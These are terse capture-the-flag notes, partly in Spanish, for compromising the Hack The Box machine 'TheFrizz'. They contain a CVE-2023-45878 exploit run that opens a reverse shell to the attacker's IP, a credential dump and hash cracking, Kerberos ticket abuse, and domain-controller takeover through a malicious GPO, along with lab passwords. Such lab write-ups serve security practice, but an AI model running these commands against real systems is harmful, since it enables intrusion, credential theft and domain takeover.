TheFrizz

Sacamos dominio

ldapsearch -x -H ldap://10.10.11.60 -s base

python3 CVE-2023-45878.py -t frizzdc.frizz.htb -s -i 10.10.14.130 -p 4444

.\mysql.exe -u MrGibbonsDB -p "MisterGibbs!Parrot!?1" -e "USE gibbon; SELECT * FROM gibbonperson;" -E

f.frizzle:$dynamic_82$067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489

john --list=subformats
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt frizle-hash.txt

john --show --format=dynamic='sha256($s.$p)' hash.txt

f.frizzle \ Jenni_Luvs_Magic23

sudo ntpdate DC  
impacket-getTGT DOMAIN/'USER':'PASS' -dc-ip DC  
export KRB5CCNAME=USER.ccache  

netexec smb frizzdc.frizz.htb -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -k

No van:

ssh f.frizzle@frizz.htb -K
evil-winrm -i frizzdc.drizz.htb -r frizz.htb -k f.frizzle.ccache

bloodhound-python  -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip -k

$shell = New-Object -ComObject Shell.Application  
$recycleBin = $shell.Namespace(0xA)  
$recycleBin.items() | Select-Object Name, Path

Restore deleted file  
  
$recycleBin = (New-Object -ComObject Shell.Application).NameSpace(0xA)  
$items = $recycleBin.Items()  
$item = $items | Where-Object {$_.Name -eq "wapt-backup-sunday.7z"}  
$documentsPath = [Environment]::GetFolderPath("Desktop")  
$documents = (New-Object -ComObject Shell.Application).NameSpace($documentsPath)  
$documents.MoveHere($item)

M.schoolbus \ !suBcig@MehTed!R

Para abusar de la creación de GPOs:

New-GPO -Name "hacker"
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
gpupdate /force